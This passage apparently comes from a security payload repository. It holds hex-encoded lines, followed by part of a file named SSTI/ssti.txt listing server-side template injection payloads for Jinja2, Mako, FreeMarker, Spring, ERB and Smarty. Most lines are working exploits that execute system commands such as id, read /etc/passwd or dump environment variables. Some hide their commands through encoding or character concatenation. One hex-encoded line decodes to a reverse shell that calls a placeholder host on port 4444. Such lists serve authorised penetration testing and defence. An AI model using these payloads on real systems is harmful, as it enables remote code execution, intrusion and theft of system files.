7b2520666f72207820696e2028292e5f5f636c6173735f5f2e5f5f626173655f5f2e5f5f737562636c61737365735f5f282920257d7b2520696620227761726e696e672220696e20782e5f5f6e616d655f5f20257d7b7b7828292e5f6d6f64756c652e5f5f6275696c74696e735f5f5b275f5f696d706f72745f5f275d28276f7327292e706f70656e2822707974686f6e33202d632027696d706f727420736f636b65742c73756270726f636573732c6f733b733d736f636b65742e736f636b657428736f636b65742e41465f494e45542c736f636b65742e534f434b5f53545245414d293b732e636f6e6e65637428285c2269705c222c3434343429293b6f732e6475703228732e66696c656e6f28292c30293b206f732e6475703228732e66696c656e6f28292c31293b206f732e6475703228732e66696c656e6f28292c32293b703d73756270726f636573732e63616c6c285b5c222f62696e2f6361745c222c205c22666c61672e7478745c225d293b2722292e7265616428292e7a66696c6c28343137297d7d7b25656e646966257d7b2520656e64666f7220257d0a 90 | 7b2520666f72207820696e2028292e5f5f636c6173735f5f2e5f5f626173655f5f2e5f5f737562636c61737365735f5f282920257d7b2520696620227761726e696e672220696e20782e5f5f6e616d655f5f20257d7b7b7828292e5f6d6f64756c652e5f5f6275696c74696e735f5f5b275f5f696d706f72745f5f275d28276f7327292e706f70656e28726571756573742e617267732e696e707574292e7265616428297d7d7b25656e646966257d7b25656e64666f72257d0a 91 | 7b34322a34327d0a 92 | 7b5e78797a6d34327d313736347b2f78797a6d34327d0a 93 | 7b7068707d6563686f20606964603b7b2f7068707d0a 94 | 7b7b2027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f2829207d7d0a 95 | 7b7b2027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28295b34305d28272f6574632f70617373776427292e726561642829207d7d0a 96 | 7b7b205b5d2e636c6173732e626173652e737562636c61737365732829207d7d0a 97 | 7b7b20636f6e6669672e6974656d7328295b345d5b315d2e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28295b34305d28222f6574632f70617373776422292e726561642829207d7d0a 98 | 7b7b2072657175657374207d7d0a 99 | 7b7b27272e5f5f636c6173735f5f2e5f5f626173655f5f2e5f5f737562636c61737365735f5f28295b3232375d2827636174202f6574632f706173737764272c207368656c6c3d547275652c207374646f75743d2d31292e636f6d6d756e696361746528297d7d0a 100 | 7b7b27272e5f5f636c6173735f5f2e6d726f28295b315d2e5f5f737562636c61737365735f5f28295b3339365d2827636174202f6574632f706173737764272c7368656c6c3d547275652c7374646f75743d2d31292e636f6d6d756e696361746528295b305d2e737472697028297d7d0a 101 | 7b7b27272e5f5f636c6173735f5f2e6d726f28295b315d2e5f5f737562636c61737365735f5f28295b3339365d282763617420666c61672e747874272c7368656c6c3d547275652c7374646f75743d2d31292e636f6d6d756e696361746528295b305d2e737472697028297d7d0a 102 | 7b7b27272e636c6173732e6d726f28295b315d2e737562636c617373657328297d7d0a 103 | 7b7b2761272e676574436c61737328292e666f724e616d6528276a617661782e7363726970742e536372697074456e67696e654d616e6167657227292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528274a61766153637269707427292e6576616c285c226e6577206a6176612e6c616e672e537472696e67282778787827295c22297d7d0a 104 | 7b7b2761272e676574436c61737328292e666f724e616d6528276a617661782e7363726970742e536372697074456e67696e654d616e6167657227292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528274a61766153637269707427292e6576616c285c2276617220783d6e6577206a6176612e6c616e672e50726f636573734275696c6465723b20782e636f6d6d616e64285c5c5c226e6574737461745c5c5c22293b206f72672e6170616368652e636f6d6d6f6e732e696f2e494f5574696c732e746f537472696e6728782e737461727428292e676574496e70757453747265616d2829295c22297d7d0a 105 | 7b7b2761272e676574436c61737328292e666f724e616d6528276a617661782e7363726970742e536372697074456e67696e654d616e6167657227292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528274a61766153637269707427292e6576616c285c2276617220783d6e6577206a6176612e6c616e672e50726f636573734275696c6465723b20782e636f6d6d616e64285c5c5c22756e616d655c5c5c222c5c5c5c222d615c5c5c22293b206f72672e6170616368652e636f6d6d6f6e732e696f2e494f5574696c732e746f537472696e6728782e737461727428292e676574496e70757453747265616d2829295c22297d7d0a 106 | 7b7b2761272e676574436c61737328292e666f724e616d6528276a617661782e7363726970742e536372697074456e67696e654d616e6167657227292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528274a61766153637269707427292e6576616c285c2276617220783d6e6577206a6176612e6c616e672e50726f636573734275696c6465723b20782e636f6d6d616e64285c5c5c2277686f616d695c5c5c22293b20782e737461727428295c22297d7d0a 107 | 7b7b2761272e746f55707065724361736528297d7d0a 108 | 7b7b322a327d7d5b5b332a335d5d0a 109 | 7b7b332a2733277d7d0a 110 | 7b7b332a337d7d0a 111 | 7b7b342a347d7d5b5b352a355d5d0a 112 | 7b7b34322a34327d7d0a 113 | 7b7b372a2737277d7d0a 114 | 7b7b372a377d7d0a 115 | 7b7b372a377d7d247b372a377d3c253d20372a3720253e247b7b372a377d7d237b372a377d247b7b3c255b2527227d7d255c0a 116 | 7b7b3d34322a34327d7d0a 117 | 7b7b5b27636174244946532f6574632f706173737764275d7c66696c746572282773797374656d27297d7d0a 118 | 7b7b5b276361745c7832302f6574632f706173737764275d7c66696c746572282773797374656d27297d7d0a 119 | 7b7b5b276964275d7c66696c746572282773797374656d27297d7d0a 120 | 7b7b6170702e726571756573742e71756572792e66696c74657228302c302c313032342c7b276f7074696f6e73273a2773797374656d277d297d7d0a 121 | 7b7b6170702e726571756573742e7365727665722e616c6c7c6a6f696e28272c27297d7d0a 122 | 7b7b636f6e6669672e5f5f636c6173735f5f2e5f5f696e69745f5f2e5f5f676c6f62616c735f5f5b276f73275d2e706f70656e28276c7327292e7265616428297d7d0a 123 | 7b7b636f6e6669672e6974656d7328297d7d0a 124 | 7b7b6379636c65722e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 125 | 7b7b64756d7028617070297d7d0a 126 | 7b7b6a6f696e65722e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 127 | 7b7b6e616d6573706163652e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 128 | 7b7b726571756573742e5f5f636c6173735f5f7d7d0a 129 | 7b7b726571756573747c6174747228225f5f636c6173735f5f22297d7d0a 130 | 7b7b726571756573747c6174747228276170706c69636174696f6e27297c6174747228275c7835665c783566676c6f62616c735c7835665c78356627297c6174747228275c7835665c7835666765746974656d5c7835665c783566272928275c7835665c7835666275696c74696e735c7835665c78356627297c6174747228275c7835665c7835666765746974656d5c7835665c783566272928275c7835665c783566696d706f72745c7835665c783566272928276f7327297c617474722827706f70656e27292827696427297c61747472282772656164272928297d7d0a 131 | 7b7b726571756573747c61747472285b225f222a322c22636c617373222c225f222a325d7c6a6f696e297d7d0a 132 | 7b7b726571756573747c61747472285b225f5f222c22636c617373222c225f5f225d7c6a6f696e297d7d0a 133 | 7b7b726571756573747c61747472285b726571756573742e617267732e7573632a322c726571756573742e617267732e636c6173732c726571756573742e617267732e7573632a325d7c6a6f696e297d7d0a 134 | 7b7b73656c662e5f54656d706c6174655265666572656e63655f5f636f6e746578742e6379636c65722e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 135 | 7b7b73656c662e5f54656d706c6174655265666572656e63655f5f636f6e746578742e6a6f696e65722e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 136 | 7b7b73656c662e5f54656d706c6174655265666572656e63655f5f636f6e746578742e6e616d6573706163652e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 137 | 7b7b73656c667d7d0a 138 | 7b7b7b34322a34327d7d7d 139 | -------------------------------------------------------------------------------- /SSTI/ssti.txt: -------------------------------------------------------------------------------- 1 | #{ 3 * 3 } 2 | #{ 7 * 7 } 3 | #{3*3} 4 | #{42*42} 5 | #{7*7} 6 | ${"freemarker.template.utility.Execute"?new()("id")} 7 | ${3*3} 8 | ${42*42} 9 | ${6*6} 10 | ${7*7} 11 | ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} 12 | ${T(java.lang.System).getenv()} 13 | ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} 14 | ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} 15 | ${donotexists|42*42} 16 | ${self.__init__.__globals__['util'].os.system('id')} 17 | ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} 18 | ${self.attr._NSAttr__parent.module.cache.util.os.system("id")} 19 | ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} 20 | ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} 21 | ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} 22 | ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} 23 | ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} 24 | ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} 25 | ${self.context._with_template._mmarker.module.cache.util.os.system("id")} 26 | ${self.context._with_template._mmarker.module.runtime.util.os.system("id")} 27 | ${self.context._with_template.module.cache.compat.inspect.os.system("id")} 28 | ${self.context._with_template.module.cache.util.os.system("id")} 29 | ${self.context._with_template.module.filters.compat.inspect.os.system("id")} 30 | ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} 31 | ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} 32 | ${self.context._with_template.module.runtime.util.os.system("id")} 33 | ${self.module.cache.compat.inspect.linecache.os.system("id")} 34 | ${self.module.cache.compat.inspect.os.system("id")} 35 | ${self.module.cache.util.compat.inspect.linecache.os.system("id")} 36 | ${self.module.cache.util.compat.inspect.os.system("id")} 37 | ${self.module.filters.compat.inspect.linecache.os.system("id")} 38 | ${self.module.filters.compat.inspect.os.system("id")} 39 | ${self.module.runtime.compat.inspect.linecache.os.system("id")} 40 | ${self.module.runtime.compat.inspect.os.system("id")} 41 | ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} 42 | ${self.module.runtime.exceptions.compat.inspect.os.system("id")} 43 | ${self.module.runtime.exceptions.traceback.linecache.os.system("id")} 44 | ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} 45 | ${self.module.runtime.exceptions.util.os.system("id")} 46 | ${self.module.runtime.util.compat.inspect.linecache.os.system("id")} 47 | ${self.module.runtime.util.compat.inspect.os.system("id")} 48 | ${self.module.runtime.util.os.system("id")} 49 | ${self.template.__init__.__globals__['os'].system('id')} 50 | ${self.template._mmarker.module.cache.compat.inspect.os.system("id")} 51 | ${self.template._mmarker.module.cache.util.os.system("id")} 52 | ${self.template._mmarker.module.filters.compat.inspect.os.system("id")} 53 | ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} 54 | ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} 55 | ${self.template._mmarker.module.runtime.util.os.system("id")} 56 | ${self.template.module.cache.compat.inspect.linecache.os.system("id")} 57 | ${self.template.module.cache.compat.inspect.os.system("id")} 58 | ${self.template.module.cache.util.compat.inspect.os.system("id")} 59 | ${self.template.module.cache.util.os.system("id")} 60 | ${self.template.module.filters.compat.inspect.linecache.os.system("id")} 61 | ${self.template.module.filters.compat.inspect.os.system("id")} 62 | ${self.template.module.runtime.compat.inspect.linecache.os.system("id")} 63 | ${self.template.module.runtime.compat.inspect.os.system("id")} 64 | ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} 65 | ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} 66 | ${self.template.module.runtime.exceptions.util.os.system("id")} 67 | ${self.template.module.runtime.util.compat.inspect.os.system("id")} 68 | ${self.template.module.runtime.util.os.system("id")} 69 | ${{3*3}} 70 | ${{7*7}} 71 | ${{<%[%'"}}%\ 72 | *{7*7} 73 | *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} 74 | 42*42 75 | <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} 76 | <%= 3 * 3 %> 77 | <%= 7 * 7 %> 78 | <%= 7*7 %> 79 | <%= File.open('/etc/passwd').read %> 80 | <%=42*42 %> 81 | @(1+2) 82 | @(6+5) 83 | [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} 84 | [7*7] 85 | [[${42*42}]] 86 | {$smarty.version} 87 | {% for key, value in config.iteritems() %}